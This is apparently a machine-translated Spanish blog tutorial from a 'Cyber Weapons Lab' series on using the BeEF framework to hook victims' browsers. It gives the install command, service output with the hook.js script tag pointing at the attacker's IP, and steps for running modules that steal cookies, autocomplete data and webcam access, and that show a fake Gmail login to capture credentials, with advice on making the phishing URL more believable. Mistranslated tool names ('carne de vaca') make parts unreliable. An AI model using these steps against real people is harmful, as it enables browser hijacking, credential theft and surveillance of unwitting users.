BlogCyber Weapons Lab

Hackear navegadores web con BeEF para controlar cámaras web, phish para obtener credenciales y más

[*]

Las personas usan los navegadores para todo tipo de cosas y, en general, les confiamos mucha información personal. Es por eso que los navegadores son una superficie de ataque perfecta para un pirata informático, porque es posible que el objetivo ni siquiera sepa que está infectado y le proporcione toda la información que pueda desear.

Para hacer esto, primero debe engañar al usuario para que haga clic en un enlace. Para generar el enlace, puede utilizar una herramienta llamada Carne de vaca, que solía estar preinstalado en Kali Linux.

Similar a Metasploit, BeEF, que significa Browser Exploitation Framework, es un marco para lanzar ataques. A diferencia de Metasploit, es específico para lanzar ataques contra navegadores web. En algunos casos, podríamos usar BeEF junto con Metasploit para iniciar escenarios de ataque más avanzados.

La herramienta fue desarrollada por un grupo de desarrolladores liderados por Wade Alcorn. Basado en la conocida plataforma Ruby on Rails, BeEF fue diseñado para explorar las vulnerabilidades en los navegadores y probarlas. En particular, BeEF es una plataforma excelente para probar la vulnerabilidad de un navegador a las secuencias de comandos entre sitios (XSS) y otros ataques de inyección.

BeEF puede generar un enlace que puede rastrear el objetivo e incluso ejecutar módulos para escalar permisos y recopilar más información sobre la persona detrás de la computadora. Incluso puede escanear detrás de la red en la que está la persona, lo cual es bastante impresionante, ya que puede tomar fotografías con su cámara web, ver lo que está escribiendo y lanzar páginas de phishing para intentar obtener credenciales.

Paso 1: Instale BeEF

BeEF está integrado en Kali Linux 2019.2 y versiones anteriores, por lo que no debería tener que instalar nada si está ejecutando una de esas versiones en su computadora.

A mediados de 2019, Kali remoto BeEF como herramienta de explotación preinstalada, moviéndola de “kali-linux-default” al metapaquete “kali-linux-large”. Eso significa que si instaló una versión nueva de Kali, ya no tendría BeEF, sin embargo, puede retenerlo si simplemente actualizó su versión anterior de Kali a 2019.3 o superior.

Si ya lo tiene, use el siguiente comando para actualizar todo. Y si no lo tiene, el mismo comando lo instalará. Solo asegúrate de usar carne-xss y no “carne” porque este último es un intérprete de lenguaje de programación, que es diferente. (Cometimos ese error en nuestro video anterior, así que no hagas lo mismo).

~$ sudo apt install beef-xss

Ya sea que lo tenga preinstalado antes o haya tenido que instalarlo, el resto es el mismo.

Paso 2: Abra el servicio BeEF

Una vez que BeEF esté instalado, puede encontrarlo en Aplicaciones -> Servicios del sistema, luego haga clic en “inicio de carne”. Se abrirá una ventana de terminal para iniciar el servicio.

Si no ve ninguna herramienta relacionada con la carne en esa carpeta, o si no ve esa carpeta en absoluto, es posible que haya instalado “carne” y no “carne-xss”, así que asegúrese de hacer lo último. (También puede iniciar BeEF desde la carpeta Exploitation Tools donde está “beef xss framework”).

> Executing “sudo beef-xss”
[sudo] password for kali:

[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:

[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="https://<IP>:3000/hook.js"></script>
[*] Example: <script src="https://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - LSB: BeEF
     Loaded: loaded (/etc/init.d/beef-xss; generated)
     Active: active (running) since Fri 2020-05-08 12:51:38 EDT; 5s ago
       Docs: man:systemd-sysv-generator(8)
    Process: 1432 ExecStart+/etc/init.d/beef-xss start (code=excited, status=0/SUCCESS)
      Tasks: 10 (limit: 6715)
     Memory: 140.8M
     CGroup: /system.slice/beef-xss.service
             └─1438 ruby /usr/share/beef-xss/beef

May 08 12:51:42 kali beef[1]: Starting LSB: BeEF...
May 08 12:51:42 kali beef[1]: Started LSB: BeEF.

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

Si se encuentra con errores en los que su navegador no se carga, puede evitar el problema abriendo su navegador web preferido, como Firefox o Chrome, y yendo a la siguiente URL, que es para el servidor web localhost (127.0.0.1) en puerto 3000.

http://127.0.0.1:3000/ui/panel

Paso 3: inicie sesión en el servicio BeEF

Una vez que se abre la interfaz del navegador, deberá iniciar sesión en el servicio BeEF. Las credenciales predeterminadas son carne de vaca para el nombre de usuario y carne de vaca para la contraseña. Sin embargo, es posible que se le haya solicitado que cree una contraseña para su sesión de carne (como se ve arriba), y en ese caso, usaría carne de vaca como nombre de usuario y la contraseña que elija.

Después de iniciar sesión correctamente, debería ver la página “Introducción” con información sobre cómo funciona BeEF. A la izquierda, está el Navegadores enlazados columna, que es donde terminarán todos los navegadores que controlas.

Paso 4: conecta el navegador de destino

La clave del éxito con BeEF es “conectar” un navegador. Esto básicamente significa que necesitamos que el objetivo visite una aplicación web vulnerable con el archivo JavaScript “hook.js”. Para practicar, BeEF proporciona una página web para su localhost con la carga útil en ella, así que visítela para ver cómo funciona.

http://127.0.0.1:3000/demos/basic.html

El código inyectado en el navegador enganchado responde a los comandos del servidor BeEF que controlamos. A partir de ahí, podemos hacer muchas cosas traviesas en la computadora del objetivo.

Paso 5: ver los detalles del navegador

Tengo algunos navegadores enganchados, pero voy a mirar el de Chrome. Haga clic en su navegador enganchado y lo llevará a la pestaña “Detalles”, que proporciona información sobre el navegador enganchado. El mío aparece como Chrome en los valores.

Esta pestaña le mostrará mucho más que eso. Para mí, veo que la plataforma es Linux x86_64; que tiene los complementos Chrome PDF, Chrome PDF Viewer y Native Client; los componentes incluyen webgl, webrtc y websocket; y otra información interesante.

Paso 6: ejecutar comandos en el navegador

Ahora que hemos conectado el navegador del objetivo, podemos ejecutar algunos de los módulos integrados desde la pestaña “Comandos”.

Hay más de 300 módulos, desde hacks de navegadores hasta ingeniería social, que incluyen, entre otros:

  • Obtener dominios visitados (navegador)
  • Obtener URL visitadas (navegador)
  • Webcam (navegador)
  • Obtener todas las cookies (extensión)
  • Agarrar Contactos de Google (extensión)
  • Captura de pantalla (extensión)
  • Robar Autocompletar (ingeniería social)
  • Google Phishing (ingeniería social)

Cuando encuentre un módulo que desee utilizar, selecciónelo y luego haga clic en “Ejecutar” debajo de su descripción. Como ejemplo, voy a utilizar el módulo “Google Phishing” en la carpeta “Ingeniería social”.

Después de ejecutarlo, aparecerá una página de inicio de sesión de Gmail falsa en el navegador enganchado. El usuario no puede pensar dos veces antes de insertar su nombre de usuario y contraseña, y una vez que lo hace, lo registramos. Posteriormente, se les redirige al sitio de Google como si hubieran iniciado sesión con regularidad.

Para encontrar el nombre de usuario y la contraseña que registramos, simplemente haga clic en el comando en el Historial de resultados del módulo columna. Para mí, veo “hfhfhf” como usuario y “sdliasdflihasdflh” como contraseña. También puede ver esta información en la pestaña “Registros”.

Si quisiéramos, podríamos personalizar la URL que utiliza el módulo Google Phishing, en caso de que desee utilizar algo más creíble que la antigua interfaz de Gmail.

Una vez que tenemos el navegador enganchado, hay posibilidades casi ilimitadas de lo que podemos hacer. Incluso podría aprovechar BeEF para ataques al sistema operativo. Para obtener más ejemplos de lo que BeEF puede ayudarlo a lograr, como obtener acceso a la cámara web y monitorear las pulsaciones de teclas, consulte nuestro video de Cyber ​​Weapons Lab anterior.

BeEF es una poderosa herramienta de ataque de navegador web

BeEF es una herramienta extraordinaria y poderosa para explotar los navegadores web, y es un ejemplo aterrador de por qué nunca debe hacer clic en enlaces sospechosos. Incluso si las cosas se ven bien, debe tener mucho cuidado con cualquier cosa que aparezca en su navegador para obtener permiso para acceder a su cámara web o audio o que necesite que ingrese las credenciales de la cuenta.

Foto de portada y capturas de pantalla de Justin Meyers / Null Byte

Publicaciones relacionadas

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Mira también
Cerrar
Botón volver arriba
Cerrar